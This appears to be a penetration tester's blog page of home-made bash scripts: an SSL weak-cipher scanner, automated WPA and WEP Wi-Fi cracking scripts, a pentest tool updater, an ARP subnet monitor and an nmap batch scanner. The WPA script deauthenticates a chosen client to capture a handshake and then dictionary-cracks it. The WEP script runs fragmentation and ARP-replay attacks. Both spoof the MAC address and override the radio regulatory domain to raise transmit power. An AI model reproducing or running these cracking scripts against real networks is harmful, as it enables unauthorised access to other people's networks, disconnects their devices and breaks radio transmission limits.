SSL scan aginst targets.txt
I have wrote an automated ssl scanning script (matts-ssl.sh). It will scan a list of targets given in targets.txt against a specific port and then report weak ciphers or SSLv2 usage. Let me know if you have any improvements.
#!/bin/bash
#
# matts-ssl.sh v1.1
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.2"
#
# This tool requires sslscan to be installed
#
# ChangeLog....
# Version 1.2 - Changed output to ssl_all.txt
# Version 1.1 - Added recommended ports and not connect removal
# Version 1.0 - First Release
#
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
echo "MESSAGE: matts-ssl.sh ${VERSION}"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CREATING DIRECTORY
#################################################################
STARTDIR=`pwd`
mkdir "${STARTDIR}/ssl"
cd ./ssl
#################################################################
# CHECKING TO SEE IF IP OR TARGETS.TXT GIVEN
#################################################################
if [ -z ${1} ]
then
echo "MESSAGE:"
echo "MESSAGE: Usage: `basename ${0}` [ip_address] [port]"
echo "MESSAGE: # `basename ${0}` 127.0.0.1 443"
echo "MESSAGE: # `basename ${0}` targets.txt 443"
echo "MESSAGE: if port is not given i will presume 443"
if [ -f ../../targets.txt ]
then
echo "MESSAGE:"
echo "MESSAGE: You should consider scanning the following ports:"
cat ../*.tcp.txt | grep "ssl" | sort | uniq
echo "MESSAGE: END OF PORT LIST"
echo "MESSAGE:"
fi
exit 1
fi
if [ ${1} = "targets.txt" ] || [ ${2} = "targets" ]
then
TARGETIP="0"
echo "MESSAGE: performing sslscan against targets.txt"
#################################################################
# CHECKING IF targets.txt file is in parent directory
#################################################################
if [ -f ../../targets.txt ]
then
echo "MESSAGE: targets.txt file located"
echo "MESSAGE: Identified hosts from targets.txt"
else
echo "MESSAGE: please create a targets.txt file the containing the hosts in the parent directory"
exit 1
fi
else
TARGETIP="`echo "${1}" | tr -cd '[:graph:]' | tr -d '[:alpha:]'`"
echo "MESSAGE: performing sslscan against ${TARGETIP}"
fi
#################################################################
# CHECKING TO SEE IF PORT GIVEN
#################################################################
if [ -z ${2} ]
then
TARGETPORT="443"
echo "MESSAGE: no port given so attempting 443"
else
TARGETPORT="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-5`"
echo "MESSAGE: targeting port ${TARGETPORT}"
fi
#################################################################
# STARING SSLSCAN
#################################################################
case ${TARGETIP} in
0)
for i in `cat ../../targets.txt`
do
echo "MESSAGE: now sslscanning ${i} on port ${TARGETPORT}"
sslscan --no-failed ${i}:${TARGETPORT} > ${i}_${TARGETPORT}_ssl.txt
done
;;
*)
echo "MESSAGE: now sslscanning ${TARGETIP} on port ${TARGETPORT}"
sslscan --no-failed ${TARGETIP}:${TARGETPORT} > ${TARGETIP}_${TARGETPORT}_ssl.txt
;;
esac
#################################################################
# DISPLAYING NICE OUTPUT OF RESULTS WITH HIGHLIGHTING
#################################################################
echo "MESSAGE: Scans finished"
read -p "MESSAGE: Press enter to see the results"
cat *_ssl.txt | grep "Testing\ SSL\|Accepted\|ERROR" > ssl__all.txt
grep -E --color=always '.*(SSLv2| 40| 56).*|' ssl__all.txt | grep -v "ERROR" | less -R
grep -E --color=always '.*(SSLv2| 40| 56).*|' ssl__all.txt | grep -v "ERROR" > ../SSL_results.txt
cd "${STARTDIR}/.."
echo "MESSAGE: Output saved to `pwd`/SSL_results.txt"
exit 0
GnackTrack
For those that don't like BT4 with the KDE interface like me I have decided to build my own pentest distro based on Gnome. I'll slowly be adding the functionality required to bring it on par with BT4. Please click here GnackTrack.co.uk to goto the GnackTrack dedicated website
Automated WPA cracking script!!!!
I have wrote an automated WPA cracking script (matts-wpacrack.sh). Let me know if you have any improvements.
#!/bin/bash
# wpacrack.sh v.1.1
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
#
VERSION="1.1"
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.1 - Randomises MAC Address on start
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
echo "MESSAGE:"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF INTERFACE IS PROVIDED
#################################################################
if [ -z ${1} ]
then
echo "MESSAGE: Version number ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel] [client]"
echo "MESSAGE: Example #`basename ${0}` wlan0 (everything else is optional)"
exit 1
else
INTERFACE="`echo "${1}" | cut -c 1-6`"
fi
#################################################################
# PUT WIFI IN HIGHPOWER AND MONITOR MODE AND RANDOM MAC
#################################################################
macchanger -r ${INTERFACE}
iw reg set BO
sleep 3
iwconfig ${INTERFACE} txpower 30
POWER=`iwlist ${INTERFACE} txpower | grep Current | tr -s ' ' | cut -d '(' -f2 | sed -e s/')'//`
echo "MESSAGE: ${INTERFACE} power set to ${POWER}"
echo "MESSAGE: Putting ${INTERFACE} in monitor mode"
airmon-ng start ${INTERFACE}
#################################################################
# GET INTERFACE MAC ADDRESS
#################################################################
MACADDRESS=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`
#################################################################
# CHECK IF BSSID,CHANNEL & TARGETNAME WERE PROVIDED
#################################################################
if [ -z ${2} ] || [ -z ${3} ]; then
#################################################################
# SHOW VISIBLE WEP NETWORKS
#################################################################
echo "MESSAGE: Will now display all visible WPA networks"
echo "MESSAGE: Once you have identified the network you wish to target press Ctrl-C to exit"
read -p "MESSAGE: Press enter to view networks"
airodump-ng --encrypt WPA ${INTERFACE} # mon0
#################################################################
# USER INPUT DETAILS FROM AIRODUMP
#################################################################
while true
do
echo -n "MESSAGE: Please enter the target BSSID here: "
read -e BSSID
echo -n "MESSAGE: Please enter the target channel here: "
read -e CHANNEL
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Channel : ${CHANNEL}"
echo "MESSAGE: Interface MAC Address : ${MACADDRESS}"
echo -n "MESSAGE: Is this information correct? (y or n): "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo "MESSAGE: Please re-enter information" ;;
esac
done
fi
#################################################################
# CHECK IF THE USER NEEDS TO FIND A CLIENT
#################################################################
#if [ -z {4} ]; then
#################################################################
# SHOW AP CLIENTS
#################################################################
echo "MESSAGE: Will now display all visable clients for ${BSSID}"
echo "MESSAGE: Once you have identified the client you wish to target press Ctrl-C to exit"
read -p "MESSAGE: Press enter to view networks"
airodump-ng -c ${CHANNEL} --bssid ${BSSID} ${INTERFACE}
while true
do
echo -n "MESSAGE: Please enter the target CLIENT here: "
read -e CLIENT
echo "MESSAGE: Target Client : ${CLIENT}"
echo -n "MESSAGE: Is this information correct? (y or n): "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo "MESSAGE: Please re-enter information" ;;
esac
done
#fi
#################################################################
# START DEAUTH TO CAPTURE WPA HANDSHAKE
#################################################################
echo "MESSAGE: Starting De-auth"
echo "MESSAGE: Once hand shake has been captured press Ctrl-C to exit"
read -p "MESSAGE: Press enter to attempt handshake capture"
xterm -e "sleep 1 && aireplay-ng -0 20 -a ${BSSID} -c ${CLIENT} ${INTERFACE}" &
airodump-ng -c ${CHANNEL} --bssid ${BSSID} -w psk ${INTERFACE}
#################################################################
# ATTEMPTING TO CRACK
#################################################################
aircrack-ng -w wpa.txt -b ${BSSID} psk*.cap -l key.txt
#################################################################
# OUTPUT BSSID AND KEY
#################################################################
KEY=`cat key.txt`
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Key : ${KEY}"
#################################################################
# DELETE FILES CREATED DURING WEP CRACKING
#################################################################
airmon-ng stop mon0
rm psk* key.txt
exit 0
If you need a dictionary file you can use this one (wpa.txt).
Automated WEP cracking script!!!!
I have wrote an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.
#!/bin/bash
# wepcrack.sh v1.3
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.3"
#
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.3 - Randomises interface MAC address
# Version 1.2 - Set txpower of card to 1000mw :-)
# Version 1.1 - Display key and BSSID at end of crack
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
echo "MESSAGE:"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF INTERFACE IS PROVIDED
#################################################################
if [ -z ${1} ]
then
echo "MESSAGE: Version number ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel]"
echo "MESSAGE: Example #`basename ${0}` wlan0 (everything else is optional)"
exit 1
else
INTERFACE="`echo "${1}" | cut -c 1-6`"
fi
#################################################################
# PUT WIFI IN HIGHPOWER AND MONITOR MODE AND CHANGE MAC
#################################################################
#macchanger -r ${INTERFACE}
iw reg set BO
iwconfig ${INTERFACE} txpower 30
POWER=`iwlist ${INTERFACE} txpower | grep Current | tr -s ' ' | cut -d '(' -f2 | sed -e s/')'//`
echo "MESSAGE: ${INTERFACE} power set to ${POWER}"
echo "MESSAGE: Putting ${INTERFACE} in monitor mode"
airmon-ng start ${INTERFACE}
#################################################################
# GET INTERFACE MAC ADDRESS
#################################################################
MACADDRESS=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`
#################################################################
# CHECK IF BSSID,CHANNEL & TARGETNAME WERE PROVIDED
#################################################################
if [ -z ${2} ] || [ -z ${3} ] ; then
#################################################################
# SHOW VISIBLE WEP NETWORKS
#################################################################
echo "MESSAGE: Will now display all visible WEP networks"
echo "MESSAGE: Once you have identified the network you wish to target press Ctrl-C to exit"
read -p "MESSAGE: Press enter to view networks"
airodump-ng --encrypt WEP ${INTERFACE} # mon0
#################################################################
# USER INPUT DETAILS FROM AIRODUMP
#################################################################
while true
do
echo -n "MESSAGE: Please enter the target BSSID here: "
read -e BSSID
echo -n "MESSAGE: Please enter the target channel here: "
read -e CHANNEL
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Channel : ${CHANNEL}"
echo "MESSAGE: Interface MAC Address : ${MACADDRESS}"
echo -n "MESSAGE: Is this information correct? (y or n): "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
fi
#################################################################
# START AIRODUMP IN XTERM WINDOW
#################################################################
echo "MESSAGE: Starting packet capture - Ctrl-c to end it"
xterm -e "airodump-ng -c ${CHANNEL} --bssid ${BSSID} --ivs -w capture ${INTERFACE}" & AIRODUMPPID=$!
sleep 2
#################################################################
# ASSOCIATE WITH AP & THEN PERFORM FRAGMENTATION ATTACK
#################################################################
aireplay-ng -1 0 -a ${BSSID} -h ${MACADDRESS} ${INTERFACE}
aireplay-ng -5 -b ${BSSID} -h ${MACADDRESS} ${INTERFACE}
packetforge-ng -0 -a ${BSSID} -h ${MACADDRESS} -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet ${INTERFACE}
xterm -e "aireplay-ng -2 -r arp-packet ${INTERFACE}" & AIREPLAYPID=$!
#################################################################
# ATTEMPTING TO CRACK
#################################################################
#while true
#do
aircrack-ng -n 128 -b ${BSSID} *.ivs -l key.txt
# echo -n "MESSAGE: Did you get the key?: (y or no)"
# read -e CONFIRM
# case $CONFIRM in
# y|Y|YES|yes|Yes)
# break ;;
# *) echo "MESSAGE: Will attempt to crack again..." && sleep 3
# esac
#done
#################################################################
# OUTPUT BSSID AND KEY
#################################################################
KEY=`cat key.txt`
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Key : ${KEY}"
#################################################################
# DELETE FILES CREATED DURING WEP CRACKING
#################################################################
kill ${AIRODUMPPID}
kill ${AIREPLAYPID}
airmon-ng stop mon0
rm *.ivs *.cap *.xor key.txt
exit 0
Lazy update script for BT4
I have wrote a little script (matts-update.sh) to update various tools on BT4
#!/bin/bash
#
# matts-update.sh v1.1
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.1"
#
# This tool requires to be run as root
#
# ChangeLog....
# Version 1.1 - added version output
# Version 1.0 - First Release
#
echo "MESSAGE: matts-update.sh ${VERSION}"
echo "MESSAGE:"
startdir=`pwd`
echo ........................................
echo Now updating Metasploit framework 3
cd /pentest/exploits/framework3/
svn update
echo Metasploit framework 3 now updated
echo ........................................
echo Now updating nessus
/opt/nessus/sbin/nessus-update-plugins
echo Nessus updating in background
echo ........................................
##echo Now updating exploit db
##cd /pentest/exploits/exploitdb
##svn up
##echo exploitDB update complete
##echo ........................................
echo Now updating OpenVas
openvas-nvt-sync
echo OpenVas update complete
echo ........................................
echo Now updating MetaSploit2
cd /pentest/exploits/framework2/
svn update
echo MetaSploit update complete
echo ........................................
#### Stuff below added 22/02/10
echo Now updating Social Engineering Toolkit SET
cd /pentest/exploits/SET/
./update_set
echo SET update complete
echo ........................................
echo Now updating Fast-Track
cd /pentest/exploits/fasttrack/
./fast-track.py -c 1 1
echo Fast-Track update complete
echo ........................................
echo Now updating Nikto
cd /pentest/scanners/nikto
./nikto.pl -update
echo Nikto update complete
echo ........................................
echo Now updating SQLMap
cd /pentest/database/sqlmap
./sqlmap.py --update
echo SQLMap update complete
echo ........................................
#### Goto dir you started in!
cd $startdir
Subnet Monitoring script
I have wrote a little script (matts-monitor.sh) to monitor for new devices on your subnet and then perform an action against each new device.
#!/bin/bash
#
# matts-monitor.sh v1.1
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.1"
#
# This tool requires nmap to be installed and to be run as root
#
# ChangeLog....
# Version 1.1 - Improved sort code
# - Added better GATEWAY detection
# - Allowed script escape by pressing enter
# - Collated argument checking into 1 if statement
# - Reports version number within usage
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
echo "MESSAGE:"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF INTERFACE AND INTERVAL PROVIDED
#################################################################
if [ -z ${1} ] || [ -z ${2} ]
then
echo "MESSAGE: Version number ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
echo "MESSAGE: Example #`basename ${0}` eth0 60"
exit 1
else
INTERFACE="`echo "${1}" | cut -c 1-6`"
echo "MESSAGE: Monitoring ${1} for new devices"
INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
fi
#################################################################
# IDENTIFY IP, GATEWAY and SUBNET
#################################################################
IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
GATEWAY=`route -n | grep ${INTERFACE} | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"
#################################################################
# PERFORMING FIRST SCAN TO CREATE WHITELIST
#################################################################
arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > WHITELIST.txt
if [[ -s WHITELIST.txt ]] ; then
echo "MESSAGE: The following devices were found and will be excluded from this monitor."
cat WHITELIST.txt
else
echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
exit 1
fi ;
#################################################################
# THIS IS THE MONITORING BIT
#################################################################
echo "MESSAGE: Press enter to exit the scanner"
while true; do
arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
sort SCAN.txt -o SCAN.txt
NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
if [ ! -z ${NEWIP} ]; then
echo "MESSAGE: New IP detected!!! ${NEWIP}"
echo ${NEWIP} >> WHITELIST.txt
#################################################################
# To run a command when new device found please enter it here
xterm -e "echo NUTS"
#################################################################
fi
sort WHITELIST.txt -o WHITELIST.txt
read -t ${INTERVAL} && break
done
#################################################################
# DELETE FILES CREATED DURING MONITORING
#################################################################
rm -rf SCAN.txt WHITELIST.txt
exit 0
Nmap 5.21 debian binary
Here is the 5.21 build of Nmap. Please click here (nmap_5.21-2_i386.deb) to download the debian binary
Ncat 5.21 debian binary
Here is the 5.21 build of Ncat. Please click here (ncat_5.21-2_i386.deb) to download the debian binary
BackTrack 4 Final
For those that are recieving poor speeds from the remote exploit servers here is the v4 Final build of BackTrack. Please click here (bt4-final.iso) to download the iso
Please note this server is in France so will be best suited to those situated in europe.
NMAP script scanning devices in targets.txt
I have wrote a little script (matts-nmap.sh) to help speed up my penetration testing, it simply scans each IP/Host inside the targets.txt file of your current directory and places the output in a folder named what ever you like. You can set it to scan x number of devices at a time, each will pop up in it's own little Xterm window.
#!/bin/bash
#
# matts-nmap.sh v1.7
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.7"
#
# This tool requires nmap to be installed and to be run as root
#
# ChangeLog....
# Version 1.7 - added output of version to help message
# Version 1.6 - fixed grepping of nmap output (nmap 5.20+ changed output text)
# Version 1.5 - checked for targets.txt file
# Version 1.4 - added count to stdout (x of y)
# Version 1.3 - added loads of comments and re-arramged if statements
# Version 1.2 - added ability to choose big/small scan
# Version 1.1 - added ability to chose directory on command line
# Version 1.0 - First Release
#
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
echo "MESSAGE: matts-nmap.sh ${VERSION}"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF NUMBER OF THREADS GIVEN
#################################################################
if [ -z ${1} ]
then
echo "MESSAGE: matts-nmap.sh ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [threads max = 99] [big/small] [directory]"
echo "MESSAGE: # `basename ${0}` 5 small VLANxyz"
echo "MESSAGE: if scan size not given i will scan all ports"
echo "MESSAGE: if directory is not given then I will write to ./devices/"
echo "MESSAGE:"
exit 1
fi
THREADS="`echo "${1}" | tr -cd '[:digit:]' | cut -c 1-2`"
#################################################################
# CHECKING TO SEE IF SIZE OF SCAN GIVEN
#################################################################
if [ ${2} = "big" ] || [ ${2} = "small" ]
then
SIZETYPE="`echo "${2}" | tr -cd '[:alnum:]' | cut -c 1-5`"
echo "MESSAGE: performing a ${SIZETYPE} scan"
else
SIZETYPE="big"
echo "MESSAGE: no scan size given or its invalid so scan size will be big."
fi
#################################################################
# CHECKING TO SEE IF DIRECTORY IS GIVEN
#################################################################
if [ -z ${3} ]
then
DIRECTORY="devices"
echo "MESSAGE: no dir given so outputting to ${DIRECTORY}"
else
DIRECTORY="`echo "${3}" | tr -cd '[:alnum:]'`"
echo "MESSAGE: output dir = ${DIRECTORY}"
fi
#################################################################
# CHECKING IF targets.txt file is in current directory
#################################################################
if [ -f ./targets.txt ]
then
echo "MESSAGE: targets.txt file located"
echo "MESSAGE: Identified hosts from targets.txt"
cat targets.txt
echo "MESSAGE: end of IPs/Hosts"
else
echo "MESSAGE: please create a targets.txt file the containing the hosts"
exit 1
fi
#################################################################
# Number of targets
#################################################################
NUMBER=`wc -l targets.txt`
COUNT=0
echo "MESSAGE: Found ${NUMBER} targets to scan"
#################################################################
# CREATING DIRECTORY
#################################################################
STARTDIR=`pwd`
mkdir "${STARTDIR}/${DIRECTORY}"
echo "MESSAGE: Starting Scan with ${THREADS} threads"
#################################################################
# STARING LOOPS OF SCANS
#################################################################
for i in `cat targets.txt`
do
TARGET=${i}
((COUNT++))
echo "MESSAGE: now scanning ${TARGET} ${COUNT} of ${NUMBER}"
case ${SIZETYPE} in
small) xterm -e "nmap -e eth0 -sS -vv -d -A -P0 -n -r -oN ${DIRECTORY}/${TARGET}.small.tcp.txt ${TARGET}" & ;;
big) xterm -e "nmap -e eth0 -sS -vv -d -A -p1-65535 -P0 -n -r -oN ${DIRECTORY}/${TARGET}.big.tcp.txt ${TARGET}" & ;;
esac
xterm -e "nmap -e eth0 -sU -vv -d -P0 -n -r -oN ${DIRECTORY}/${TARGET}.udp.txt ${TARGET}" &
while [ `ps -Aef --cols 200 | grep ${DIRECTORY} | grep xterm | grep -v grep | wc -l` -ge ${THREADS} ]
do
sleep 2
done
done
#################################################################
# WAITING FOR ALL SCANS TO FINISH
#################################################################
while [ `ps -Aef --cols 200 | grep ${DIRECTORY} | grep xterm | grep -v grep | wc -l` -gt 0 ]
do
echo MESSAGE: `ps -Aef --cols 200 | grep ${DIRECTORY} | grep xterm | grep -v grep | wc -l`processes still running
sleep 10
done
echo "MESSAGE: Scanning Complete"
#################################################################
# DISPLAYING NICE OUTPUT OF RESULTS WITH HIGHLIGHTING
#################################################################
cd "${STARTDIR}/${DIRECTORY}"
cat *p.txt | grep "scan\ report\ for\|Interesting\|open\|---------------------------------------------" | grep -v "OSScan" > open_ports.txt
grep -E --color=always '.*(rdp|ssl|http|telnet|https|sslv2|mail|smtp|snmp).*|' open_ports.txt | less -R
cd "${STARTDIR}/.."
exit 0
HP DL320 Fan Speed
For those that have wife issues due to loud fan speeds you can install HP_ASM and HP_SMH. Please click here (HP_DL320_G2) to download the various versions.